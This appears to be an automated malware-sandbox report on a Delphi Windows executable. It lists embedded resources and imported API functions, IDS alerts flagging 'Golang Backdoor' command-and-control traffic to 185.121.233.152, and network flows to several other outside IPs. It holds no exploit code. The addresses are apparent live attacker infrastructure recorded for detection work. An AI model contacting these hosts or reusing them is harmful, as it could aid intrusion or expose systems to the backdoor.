                          RT_RCDATA0x11012b80x49dPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0093141405588484
                          RT_RCDATA0x11017580x304PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0142487046632125
                          RT_RCDATA0x1101a5c0x443PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.010082493125573
                          RT_RCDATA0x1101ea00x579PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0078515346181298
                          RT_RCDATA0x110241c0x31cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013819095477387
                          RT_RCDATA0x11027380x4c0PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009046052631579
                          RT_RCDATA0x1102bf80x645PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.006853582554517
                          RT_RCDATA0x11032400x30ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.014066496163683
                          RT_RCDATA0x11035500x3d2PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0112474437627812
                          RT_RCDATA0x11039240xd65Delphi compiled form 'TCheckGroupEditorDlg'0.342082239720035
                          RT_RCDATA0x110468c0x6feDelphi compiled form 'TCheckListBoxEditorDlg'0.3865921787709497
                          RT_RCDATA0x1104d8c0x575Delphi compiled form 'TCollectionPropertyEditorForm'0.42018611309949894
                          RT_RCDATA0x11053040x352Delphi compiled form 'TComponentListEditorForm'0.5141176470588236
                          RT_RCDATA0x11056580x886Delphi compiled form 'TDataPointsEditorForm'0.45187901008249315
                          RT_RCDATA0x1105ee00x2bePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0156695156695157
                          RT_RCDATA0x11061a00x3c8PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0113636363636365
                          RT_RCDATA0x11065680x4b4PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0091362126245846
                          RT_RCDATA0x1106a1c0x3c9PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0113519091847265
                          RT_RCDATA0x1106de80x473PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009657594381036
                          RT_RCDATA0x110725c0x701PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0061349693251533
                          RT_RCDATA0x11079600x9453Delphi compiled form 'TEditListForm'0.5148139369518844
                          RT_RCDATA0x1110db40x1ac5Delphi compiled form 'TEnvMsgForm'0.41062308478038817
                          RT_RCDATA0x111287c0x664Delphi compiled form 'TFileFilterPropEditForm'0.4339853300733496
                          RT_RCDATA0x1112ee00x3756Delphi compiled form 'TFormUserPerf'0.312861781730905
                          RT_RCDATA0x11166380x2178Delphi compiled form 'TFrame_Profile'0.29901960784313725
                          RT_RCDATA0x11187b00x1ba9Delphi compiled form 'TfrmIncluirPerfil'0.47691004095466744
                          RT_RCDATA0x111a35c0x274dDelphi compiled form 'TfrmIncluirUsuario'0.4294801709571613
                          RT_RCDATA0x111caac0x1165Delphi compiled form 'TfrmLoginWindow'0.4212890186391197
                          RT_RCDATA0x111dc140xda4Delphi compiled form 'TGraphicPropertyEditorForm'0.3104238258877434
                          RT_RCDATA0x111e9b80x17bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0158311345646438
                          RT_RCDATA0x111eb340x1f5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0219560878243512
                          RT_RCDATA0x111ed2c0x24cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0187074829931972
                          RT_RCDATA0x111ef780x792Delphi compiled form 'TKeyValPropEditorFrm'0.4102167182662539
                          RT_RCDATA0x111f70c0x235PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0194690265486726
                          RT_RCDATA0x111f9440x2f3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.014569536423841
                          RT_RCDATA0x111fc380x362PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.01270207852194
                          RT_RCDATA0x111ff9c0x11905Delphi compiled form 'TMainForm'0.6137529364340223
                          RT_RCDATA0x11318a40x10fbDelphi compiled form 'TMaskEditorForm'0.2797331492983667
                          RT_RCDATA0x11329a00x1535Delphi compiled form 'TMsgRecForm'0.3442622950819672
                          RT_RCDATA0x1133ed80x60c2Delphi compiled form 'TMsgsForm'0.15651998385143318
                          RT_RCDATA0x1139f9c0x440PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.010110294117647
                          RT_RCDATA0x113a3dc0x795PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.005667181865018
                          RT_RCDATA0x113ab740x9fbPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043052837573385
                          RT_RCDATA0x113b5700xa67Delphi compiled form 'TNewListForm'0.4693954187007135
                          RT_RCDATA0x113bfd80x52dDelphi compiled form 'TObjectInspectorDlg'0.48452830188679247
                          RT_RCDATA0x113c5080x992Delphi compiled form 'TOptionForm'0.3926530612244898
                          RT_RCDATA0x113ce9c0xb3dDelphi compiled form 'TPagesPropEditorFrm'0.26312130691692737
                          RT_RCDATA0x113d9dc0x308PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0141752577319587
                          RT_RCDATA0x113dce40x450PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0099637681159421
                          RT_RCDATA0x113e1340x57cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0078347578347577
                          RT_RCDATA0x113e6b00x17aDelphi compiled form 'TScreenForm'0.7222222222222222
                          RT_RCDATA0x113e82c0xd53Delphi compiled form 'TSelectPropertiesForm'0.29991204925241866
                          RT_RCDATA0x113f5800x971Delphi compiled form 'TSenhaForm'0.6301199834505585
                          RT_RCDATA0x113fef40x1071Delphi compiled form 'TSmallOrderedSetEditDlg'0.2753623188405797
                          RT_RCDATA0x1140f680x2e1PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0149253731343284
                          RT_RCDATA0x114124c0x495PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0093776641091219
                          RT_RCDATA0x11416e40x5aaPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0075862068965518
                          RT_RCDATA0x1141c900x3c17Delphi compiled form 'TStringGridEditorDlg'0.7323018916986284
                          RT_RCDATA0x11458a80x9cbDelphi compiled form 'TStringsPropEditorFrm'0.33905065815715996
                          RT_RCDATA0x11462740x431PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0102516309412861
                          RT_RCDATA0x11466a80x6f5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0061763054463784
                          RT_RCDATA0x1146da00x9dcPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043581616481776
                          RT_RCDATA0x114777c0x40aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0106382978723405
                          RT_RCDATA0x1147b880x709PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0061077179344808
                          RT_RCDATA0x11482940x9adPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0044408558740412
                          RT_RCDATA0x1148c440x455PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0099188458070334
                          RT_RCDATA0x114909c0x769PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0057986294148655
                          RT_RCDATA0x11498080x9cfPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043807248108323
                          RT_RCDATA0x114a1d80x463PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0097951914514693
                          RT_RCDATA0x114a63c0x679PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0066385033192518
                          RT_RCDATA0x114acb80x9c7PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043947263284059
                          RT_RCDATA0x114b6800x439PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0101757631822386
                          RT_RCDATA0x114babc0x714PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060706401766004
                          RT_RCDATA0x114c1d00x90fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0047434238896076
                          RT_RCDATA0x114cae00x39cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0119047619047619
                          RT_RCDATA0x114ce7c0x63bPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.006896551724138
                          RT_RCDATA0x114d4b80x888PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.00503663003663
                          RT_RCDATA0x114dd400x369PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0126002290950744
                          RT_RCDATA0x114e0ac0x615PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0070648683365446
                          RT_RCDATA0x114e6c40x7ffPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0053737176355642
                          RT_RCDATA0x114eec40x41ePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104364326375712
                          RT_RCDATA0x114f2e40x739PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.005949161709032
                          RT_RCDATA0x114fa200x9f9PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043086564825696
                          RT_RCDATA0x115041c0x440PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.010110294117647
                          RT_RCDATA0x115085c0x745PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0059108006448145
                          RT_RCDATA0x1150fa40x96cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0045605306799337
                          RT_RCDATA0x11519100x401PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0107317073170732
                          RT_RCDATA0x1151d140x69dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.006497341996456
                          RT_RCDATA0x11523b40x8eePNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.004811898512686
                          RT_RCDATA0x1152ca40x3acPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0117021276595746
                          RT_RCDATA0x11530500x658PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0067733990147782
                          RT_RCDATA0x11536a80x885PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.005043558000917
                          RT_RCDATA0x1153f300x3bbPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0115183246073298
                          RT_RCDATA0x11542ec0x651PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0068027210884354
                          RT_RCDATA0x11549400x869PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051091500232234
                          RT_RCDATA0x11551ac0x567PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0079537237888647
                          RT_RCDATA0x11557140xa0cPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.004276827371695
                          RT_RCDATA0x11561200xdc7PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0031187978451943
                          RT_RCDATA0x1156ee80x377PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.012401352874859
                          RT_RCDATA0x11572600x685PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0065907729179149
                          RT_RCDATA0x11578e80x85aPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051449953227316
                          RT_RCDATA0x11581440x37fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.012290502793296
                          RT_RCDATA0x11584c40x5c9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0074274139095205
                          RT_RCDATA0x1158a900x7c3PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0055359838953195
                          RT_RCDATA0x11592540x470PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0096830985915493
                          RT_RCDATA0x11596c40x791PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0056788848735156
                          RT_RCDATA0x1159e580xa3bPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0042000763650247
                          RT_RCDATA0x115a8940x866Delphi compiled form 'TTimePopupForm'0.4441860465116279
                          RT_RCDATA0x115b0fc0x3cdPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0113052415210688
                          RT_RCDATA0x115b4cc0x650PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0068069306930694
                          RT_RCDATA0x115bb1c0x895PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0050068274920345
                          RT_RCDATA0x115c3b40x348PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013095238095238
                          RT_RCDATA0x115c6fc0x626PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0069885641677256
                          RT_RCDATA0x115cd240x754PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.005863539445629
                          RT_RCDATA0x115d4780x420PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104166666666667
                          RT_RCDATA0x115d8980x726PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060109289617487
                          RT_RCDATA0x115dfc00x987PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.004510045100451
                          RT_RCDATA0x115e9480x430PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0102611940298507
                          RT_RCDATA0x115ed780x725PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060142154182614
                          RT_RCDATA0x115f4a00x975PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0045435770342834
                          RT_RCDATA0x115fe180x3a3PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.011815252416756
                          RT_RCDATA0x11601bc0x638PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0069095477386936
                          RT_RCDATA0x11607f40x866PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051162790697674
                          RT_RCDATA0x116105c0x1dd5Delphi compiled form 'TTrocaSenha'0.5284797695430142
                          RT_RCDATA0x1162e340x7c12Delphi compiled form 'TUCAboutForm'0.9044140797179019
                          RT_RCDATA0x116aa480x78a9Delphi compiled form 'TUCEditorForm'0.45071060895464404
                          RT_RCDATA0x11722f40xf3eDelphi compiled form 'TUCEMailForm'0.26319835981547923
                          RT_RCDATA0x11732340x284cDelphi compiled form 'TUCFrame_Log'0.2678363706863125
                          RT_RCDATA0x1175a800x28e8Delphi compiled form 'TUCFrame_User'0.3364209320091673
                          RT_RCDATA0x11783680xfe1Delphi compiled form 'TUCFrame_UsersLogged'0.4777367773677737
                          RT_RCDATA0x117934c0x43fcDelphi compiled form 'TUCObjSel'0.22264996552516664
                          RT_RCDATA0x117d7480x33aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013317191283293
                          RT_RCDATA0x117da840x4c1PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009038619556286
                          RT_RCDATA0x117df480x5ffPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0071661237785017
                          RT_RCDATA0x117e5480x3fafDelphi compiled form 'TUserPermis'0.3025210084033613
                          RT_GROUP_CURSOR0x11824f80x14Lotus unknown worksheet or configuration, revision 0x11.25
                          RT_GROUP_CURSOR0x118250c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                          RT_GROUP_CURSOR0x11825200x30Lotus unknown worksheet or configuration, revision 0x30.8958333333333334
                          RT_GROUP_CURSOR0x11825500x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825800x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825b00x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825e00x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826100x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826400x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826700x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826840x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826980x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826ac0x14Lotus unknown worksheet or configuration, revision 0x1SerbianItaly1.3
                          RT_GROUP_ICON0x11826c00x14data1.15
                          RT_VERSION0x11826d40x298OpenPGP Public Key0.48493975903614456
                          RT_MANIFEST0x118296c0x6e6XML 1.0 document, ASCII text, with CRLF line terminators0.41959229898074746
DLL | Import
kernel32.dll | GetStdHandle, GetConsoleMode, TlsGetValue, GetLastError, SetLastError, RaiseException, GetTickCount, ExitProcess, GetStartupInfoA, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetCurrentProcess, ReadProcessMemory, GetModuleFileNameA, GetModuleHandleA, WriteFile, ReadFile, CloseHandle, SetFilePointer, GetFileSize, SetEndOfFile, GetSystemInfo, LoadLibraryW, LoadLibraryA, GetProcAddress, FreeLibrary, FormatMessageW, DeleteFileW, CreateFileW, GetFileAttributesW, CreateDirectoryW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, GetConsoleOutputCP, GetOEMCP, GetProcessHeap, HeapAlloc, HeapFree, TlsAlloc, TlsSetValue, CreateThread, ExitThread, LocalAlloc, LocalFree, Sleep, SuspendThread, ResumeThread, TerminateThread, WaitForSingleObject, SetThreadPriority, GetThreadPriority, GetCurrentThread, OpenThread, IsDebuggerPresent, CreateEventA, ResetEvent, SetEvent, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetACP, GetConsoleCP, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlUnwindEx, EnumResourceTypesA, EnumResourceNamesA, EnumResourceLanguagesA, FindResourceA, FindResourceExA, LoadResource, SizeofResource, LockResource, FreeResource, GetEnvironmentStringsA, FreeEnvironmentStringsA, FormatMessageA, CreateFileMappingA, GetLogicalDriveStringsA, GlobalAddAtomA, GetWindowsDirectoryA, GetComputerNameA, GetVersionExA, CompareStringA, GetLocaleInfoA, GetDateFormatA, EnumCalendarInfoA, GetModuleFileNameW, GetCommandLineW, GetSystemDirectoryW, SetFileAttributesW, CreateProcessW, FindNextFileW, CompareStringW, GetLocaleInfoW, GetDateFormatW, FindFirstFileExW, GlobalAlloc, GlobalReAlloc, GlobalSize, GlobalLock, GlobalUnlock, GetProcessAffinityMask, TerminateProcess, GetExitCodeProcess, GetExitCodeThread, SetErrorMode, GlobalDeleteAtom, DeviceIoControl, FindClose, DuplicateHandle, MulDiv, GetLocalTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, CreatePipe, PeekNamedPipe, MapViewOfFile, UnmapViewOfFile, GetCPInfo, GetThreadLocale, SetThreadLocale, GetUserDefaultLCID
oleaut32.dll | SysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeTypeEx, VariantClear, VariantCopy, VariantInit, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayRedim, SafeArrayUnaccessData
user32.dll | MessageBoxA, CharUpperBuffW, CharLowerBuffW, RegisterWindowMessageA, PeekMessageA, SendMessageA, PostMessageA, DefWindowProcA, CallWindowProcA, RegisterClassA, UnregisterClassA, GetClassInfoA, RegisterClassExA, GetClassInfoExA, CreateWindowExA, SendDlgItemMessageA, RegisterClipboardFormatA, GetClipboardFormatNameA, CharToOemA, CharUpperA, CharUpperBuffA, CharLowerA, CharLowerBuffA, GetMenuItemInfoA, SetPropA, GetPropA, RemovePropA, EnumPropsA, GetWindowLongA, SetWindowLongA, GetClassLongA, GetClassLongPtrA, SetClassLongPtrA, FindWindowA, GetClassNameA, LoadBitmapA, LoadCursorA, LoadIconA, LoadImageA, SystemParametersInfoA, DispatchMessageW, PeekMessageW, SendMessageW, PostMessageW, DefWindowProcW, CallWindowProcW, RegisterClassW, UnregisterClassW, GetClassInfoW, CreateWindowExW, InsertMenuItemW, GetMenuItemInfoW, SetMenuItemInfoW, DrawTextW, DrawStateW, SetWindowTextW, GetWindowTextW, GetWindowTextLengthW, MessageBoxW, GetWindowLongPtrW, SetWindowLongPtrW, DefFrameProcW, DefMDIChildProcW, TranslateMessage, PostQuitMessage, GetDoubleClickTime, IsWindow, IsMenu, DestroyWindow, ShowWindow, ShowWindowAsync, MoveWindow, SetWindowPos, GetWindowPlacement, SetWindowPlacement, BeginDeferWindowPos, DeferWindowPos, EndDeferWindowPos, IsWindowVisible, IsIconic, BringWindowToTop, IsZoomed, GetDlgItem, GetDialogBaseUnits, OpenClipboard, CloseClipboard, SetClipboardData, GetClipboardData, CountClipboardFormats, EnumClipboardFormats, EmptyClipboard, IsClipboardFormatAvailable, SetFocus, GetActiveWindow, GetFocus, GetKeyState, GetCapture, SetCapture, ReleaseCapture, MsgWaitForMultipleObjects, SetTimer, KillTimer, EnableWindow, IsWindowEnabled, GetSystemMetrics, GetMenu, SetMenu, DrawMenuBar, GetSystemMenu, CreateMenu, CreatePopupMenu, DestroyMenu, EnableMenuItem, GetSubMenu, GetMenuItemCount, RemoveMenu, DeleteMenu, GetMenuItemRect, UpdateWindow, SetActiveWindow, GetForegroundWindow, SetForegroundWindow, WindowFromDC, GetDC, GetDCEx, GetWindowDC, ReleaseDC, BeginPaint, EndPaint, GetUpdateRect, SetWindowRgn, InvalidateRect, InvalidateRgn, RedrawWindow, ScrollWindowEx, ShowScrollBar, EnableScrollBar, GetClientRect, GetWindowRect, AdjustWindowRectEx, MessageBeep, SetCursorPos, SetCursor, GetCursorPos, CreateCaret, GetCaretBlinkTime, DestroyCaret, HideCaret, ShowCaret, SetCaretPos, GetCaretPos, ClientToScreen, ScreenToClient, MapWindowPoints, WindowFromPoint, GetSysColor, GetSysColorBrush, SetSysColors, DrawFocusRect, FillRect, FrameRect, SetRect, InflateRect, IntersectRect, UnionRect, OffsetRect, IsRectEmpty, PtInRect, GetDesktopWindow, GetParent, SetParent, EnumChildWindows, EnumThreadWindows, GetTopWindow, GetWindowThreadProcessId, GetLastActivePopup, GetWindow, CallNextHookEx, DestroyCursor, DestroyIcon, CopyImage, CreateIconIndirect, GetIconInfo, SetScrollInfo, GetScrollInfo, TranslateMDISysAccel, DrawEdge, DrawFrameControl, TrackPopupMenuEx, ChildWindowFromPointEx, DrawIconEx, FlashWindowEx, GetAncestor
advapi32.dll | GetUserNameA, RegSetValueExW, RegQueryValueExW, RegCreateKeyExW, RegOpenKeyExW, RegCloseKey, RegFlushKey
gdi32.dll | CreateFontIndirectA, EnumFontFamiliesA, GetCharABCWidthsA, GetTextExtentPointA, GetTextMetricsA, GetObjectA, ExtTextOutA, CreateFontIndirectW, EnumFontFamiliesExW, GetCharABCWidthsW, GetTextExtentPoint32W, GetTextExtentExPointW, GetObjectW, TextOutW, ExtTextOutW, GetRandomRgn, Arc, BitBlt, Chord, CombineRgn, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBitmap, CreateEllipticRgn, CreatePen, CreatePenIndirect, CreatePatternBrush, CreateRectRgn, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Ellipse, EqualRgn, ExcludeClipRect, ExtCreateRegion, ExtFloodFill, FillRgn, GetROP2, GetBkColor, GetBitmapBits, GetClipBox, GetClipRgn, GetCurrentObject, GetDeviceCaps, GetDIBits, GetMapMode, GetObjectType, GetPixel, GetRegionData, GetRgnBox, GetStockObject, GetTextAlign, GetTextColor, GetViewportExtEx, GetViewportOrgEx, GetWindowExtEx, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, OffsetRgn, PatBlt, Pie, PaintRgn, PtInRegion, RectInRegion, RectVisible, Rectangle, RestoreDC, RealizePalette, RoundRect, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetPixel, SetPolyFillMode, StretchBlt, SetRectRgn, StretchDIBits, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, CreateDIBSection, SetArcDirection, ExtCreatePen, MoveToEx, CreatePolygonRgn, DPtoLP, LPtoDP, Polygon, Polyline, PolyBezier, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, SetBrushOrgEx, GetDCOrgEx
version.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
shell32.dll | DragQueryFileA, ShellExecuteA, Shell_NotifyIconA, DragQueryFileW, Shell_NotifyIconW, DragFinish, DragAcceptFiles, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW
ole32.dll | CoCreateGuid, CoTaskMemFree, OleInitialize, OleUninitialize, OleCreateFromFile, OleSetContainedObject, CreateILockBytesOnHGlobal, CoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemAlloc, StgCreateDocfile, StgCreateDocfileOnILockBytes, GetErrorInfo
comctl32.dll | InitCommonControls, ImageList_Create, ImageList_Destroy, ImageList_GetImageCount, ImageList_SetImageCount, ImageList_Add, ImageList_Replace, ImageList_AddMasked, ImageList_DrawEx, ImageList_DrawIndirect, ImageList_Remove, ImageList_Copy, ImageList_BeginDrag, ImageList_EndDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, _TrackMouseEvent
imm32.dll | ImmGetContext, ImmReleaseContext, ImmGetCompositionStringW, ImmNotifyIME
comdlg32.dll | ChooseColorA, CommDlgExtendedError, GetOpenFileNameW, GetSaveFileNameW, ChooseFontW
Language of compilation system | Country where language is spoken | Map
English | United States |
Serbian | Italy |
Portuguese | Brazil |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T23:24:07.286691+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 185.121.233.152 | 28250 | 192.168.2.4 | 49763 | TCP
2024-12-04T23:24:07.286896+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.4 | 49763 | 185.121.233.152 | 28250 | TCP
2024-12-04T23:24:36.083072+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.4 | 49763 | 185.121.233.152 | 28250 | TCP
2024-12-04T23:24:36.469876+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 185.121.233.152 | 28250 | 192.168.2.4 | 49763 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Dec 4, 2024 23:23:32.413621902 CET | 49741 | 80 | 192.168.2.4 | 46.8.232.106
                          Dec 4, 2024 23:23:32.533416033 CET | 80 | 49741 | 46.8.232.106 | 192.168.2.4
                          Dec 4, 2024 23:23:32.533818007 CET | 49741 | 80 | 192.168.2.4 | 46.8.232.106
                          Dec 4, 2024 23:23:32.534853935 CET | 49741 | 80 | 192.168.2.4 | 46.8.232.106
                          Dec 4, 2024 23:23:32.654566050 CET | 80 | 49741 | 46.8.232.106 | 192.168.2.4
                          Dec 4, 2024 23:23:42.410769939 CET | 49741 | 80 | 192.168.2.4 | 46.8.232.106
                          Dec 4, 2024 23:23:42.412579060 CET | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                          Dec 4, 2024 23:23:42.532335997 CET | 80 | 49742 | 46.8.236.61 | 192.168.2.4
                          Dec 4, 2024 23:23:42.532434940 CET | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                          Dec 4, 2024 23:23:42.532676935 CET | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                          Dec 4, 2024 23:23:42.570749044 CET | 80 | 49741 | 46.8.232.106 | 192.168.2.4
                          Dec 4, 2024 23:23:42.652481079 CET | 80 | 49742 | 46.8.236.61 | 192.168.2.4
                          Dec 4, 2024 23:23:52.423908949 CET | 49742 | 80 | 192.168.2.4 | 46.8.236.61
                          Dec 4, 2024 23:23:52.425318003 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
                          Dec 4, 2024 23:23:52.545067072 CET | 80 | 49743 | 91.212.166.91 | 192.168.2.4
                          Dec 4, 2024 23:23:52.545312881 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
                          Dec 4, 2024 23:23:52.545561075 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
                          Dec 4, 2024 23:23:52.586755037 CET | 80 | 49742 | 46.8.236.61 | 192.168.2.4
                          Dec 4, 2024 23:23:52.665402889 CET | 80 | 49743 | 91.212.166.91 | 192.168.2.4
                          Dec 4, 2024 23:23:53.901345015 CET | 80 | 49743 | 91.212.166.91 | 192.168.2.4
                          Dec 4, 2024 23:23:53.902575970 CET | 49744 | 80 | 192.168.2.4 | 188.130.206.243
                          Dec 4, 2024 23:23:53.949980021 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
                          Dec 4, 2024 23:23:54.022780895 CET | 80 | 49744 | 188.130.206.243 | 192.168.2.4
                          Dec 4, 2024 23:23:54.023026943 CET | 49744 | 80 | 192.168.2.4 | 188.130.206.243
                          Dec 4, 2024 23:23:54.023226976 CET | 49744 | 80 | 192.168.2.4 | 188.130.206.243
                          Dec 4, 2024 23:23:54.142873049 CET | 80 | 49744 | 188.130.206.243 | 192.168.2.4
                          Dec 4, 2024 23:23:54.445663929 CET | 80 | 49741 | 46.8.232.106 | 192.168.2.4
                          Dec 4, 2024 23:23:54.449816942 CET | 49741 | 80 | 192.168.2.4 | 46.8.232.106
                          Dec 4, 2024 23:24:02.553267002 CET | 49743 | 80 | 192.168.2.4 | 91.212.166.91
